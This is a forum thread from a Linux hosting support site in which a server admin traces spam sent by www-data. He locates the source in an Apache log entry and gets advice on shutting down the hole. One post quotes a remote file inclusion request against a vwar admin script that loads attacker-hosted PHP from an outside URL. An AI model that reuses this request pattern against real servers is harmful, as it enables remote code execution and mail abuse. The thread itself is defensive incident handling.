Go Back   HowtoForge Forums | HowtoForge - Linux Howtos and Tutorials > ISPConfig 2 > General

Do you like HowtoForge? Please consider supporting us by becoming a subscriber.
Reply
 
Thread Tools Display Modes
  #1  
Old 17th May 2006, 09:30
rayit rayit is offline
Member
 
Join Date: Nov 2005
Posts: 93
Thanks: 0
Thanked 2 Times in 2 Posts
Question spam from my server from account www-data?

Seems my server was listed on some spam filter sites..

I see al lot of messages in the mailq.
all starting with www-data@.....

how to prevend this, what is it???


thanks

Raymond
RayIT

After some googling something like this should be in the vhost file
to know which domain is giving the problem???

php_admin_value sendmail_path "/usr/sbin/sendmail -t -i -fUSER at example.com"

maybe for future updates of ISPCONFIG??

Are there other sollutions??

<b>Biggest problem is I can not find the website which has the bad script??!!!</b>

example:

May 17 06:39:07 ns1 postfix/qmgr[32348]: 60A0C372868: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6559F3728E0: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6D48E373256: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 66857372E3C: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6CA233732CE: from=<www-data@ns1.rayit.com>, size=4427, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 619D9372802: from=<www-data@ns1.rayit.com>, size=4422, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67217372C41: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6A6FA372831: from=<www-data@ns1.rayit.com>, size=4425, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6F496372827: from=<www-data@ns1.rayit.com>, size=4419, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 650D6372B01: from=<www-data@ns1.rayit.com>, size=4417, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 61AD43728AE: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 627E7372D8A: from=<www-data@ns1.rayit.com>, size=4424, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 64C7237317B: from=<www-data@ns1.rayit.com>, size=4421, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 69DCD3729D5: from=<www-data@ns1.rayit.com>, size=4412, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 694713729E7: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 65149372A83: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67DEA372EF5: from=<www-data@ns1.rayit.com>, size=4415, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 67FFC372EFA: from=<www-data@ns1.rayit.com>, size=4414, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6BEB1372EA2: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 63935372D18: from=<www-data@ns1.rayit.com>, size=4418, nrcpt=1 (queue active)
May 17 06:39:07 ns1 postfix/qmgr[32348]: 6B528372FF8: from=<www-data@ns1.rayit.com>, size=4423, nrcpt=1 (queue active)

Last edited by rayit; 17th May 2006 at 14:29.
Reply With Quote
Sponsored Links
  #2  
Old 17th May 2006, 16:09
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,745 Times in 2,578 Posts
Default

Seems like someone is abusing a contact form, guestbook, etc. on one of your web sites to send spam...
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #3  
Old 17th May 2006, 16:40
rayit rayit is offline
Member
 
Join Date: Nov 2005
Posts: 93
Thanks: 0
Thanked 2 Times in 2 Posts
Default how do i know which web?

I can not find which web is causing the problem.

Reply With Quote
  #4  
Old 17th May 2006, 17:09
falko falko is offline
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 41,701
Thanks: 1,900
Thanked 2,745 Times in 2,578 Posts
Default

You could check your Apache's access log.
__________________
Falko
--
Download the ISPConfig 3 Manual! | Check out the ISPConfig 3 Billing Module!

FB: http://www.facebook.com/howtoforge

nginx-Webhosting: Timme Hosting | Follow me on:
Reply With Quote
  #5  
Old 17th May 2006, 17:42
rayit rayit is offline
Member
 
Join Date: Nov 2005
Posts: 93
Thanks: 0
Thanked 2 Times in 2 Posts
Unhappy help...

can find nothing in the apache log files

maybe have a look?

http://www.rayit.com/syslog

and

http://www.rayit.com/ispconfig_access_log

please have a look for me...
Reply With Quote
  #6  
Old 18th May 2006, 00:38
rayit rayit is offline
Member
 
Join Date: Nov 2005
Posts: 93
Thanks: 0
Thanked 2 Times in 2 Posts
Exclamation problem probably found

www.bob-gaming.nl||||163464||||81.199.83.160 - - [17/May/2006:10:29:27 +0200]
"POST /modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?
HTTP/1.1" 200 163464
"http://www.bob-gaming.nl/modules/vwar/admin/admin.php?vwar_root=http://albax.host.sk/.xpl/phpmailer.txt?"
"Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"


Seems to be the problem, I think.
Reply With Quote
  #7  
Old 18th May 2006, 00:50
Norman Norman is offline
HowtoForge Supporter
 
Join Date: May 2006
Posts: 242
Thanks: 0
Thanked 18 Times in 14 Posts
Default

Turn him off asap and ask user to resolve.
__________________
http://www.xh.se
Reply With Quote
  #8  
Old 18th May 2006, 09:30
till till is online now
Super Moderator
 
Join Date: Apr 2005
Location: Lüneburg, Germany
Posts: 36,494
Thanks: 835
Thanked 5,534 Times in 4,352 Posts
Default

I can only agree to Norman, turn the account off as soon as possible, e.g. with an .htaccess file. Your spam problem seems to be only the pike of the iceberg. The script seems to allow execution of external PHP code provided by an URL to the variable vwar_root.
__________________
Till Brehm
--
Get ISPConfig support and the ISPConfig 3 manual from ispconfig.org.
Reply With Quote
  #9  
Old 18th May 2006, 14:07
rayit rayit is offline
Member
 
Join Date: Nov 2005
Posts: 93
Thanks: 0
Thanked 2 Times in 2 Posts
Thumbs up thanks

I chmod 000 the files and made user root
hopefully if user will update to newest release problems will be fixed..

Will point the webmaster of the site to

http://www.vwar.de/

various security leaks which could allow malicious users to include a (remote) file and eg. execute php commands on the server hosting vwar

thanks

Raymond
RayIT
Reply With Quote
  #10  
Old 15th March 2012, 16:37
dayjahone dayjahone is offline
Senior Member
 
Join Date: Jan 2007
Posts: 421
Thanks: 31
Thanked 0 Times in 0 Posts
 
Default

I think I have the same problem. Sorry for the lame question, but where do I go to look at the apache log? I'm running Ubuntu.

Last edited by dayjahone; 15th March 2012 at 16:42.
Reply With Quote
Reply

Bookmarks

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
Statistic not working mzo Installation/Configuration 49 20th April 2011 13:19
ispconfig and mambo shajazzi Installation/Configuration 70 28th March 2006 20:29
server blocked/stopped by host Ovidiu Technical 11 14th February 2006 11:50
Email - Ueb-Miau mazhar Installation/Configuration 5 21st December 2005 11:01
The Perfect Setup Suse 9.3 - Postfix problems new_bee05 HOWTO-Related Questions 20 25th November 2005 03:30


All times are GMT +2. The time now is 15:08.


Powered by vBulletin® Version 3.8.7
Copyright ©2000 - 2014, vBulletin Solutions, Inc.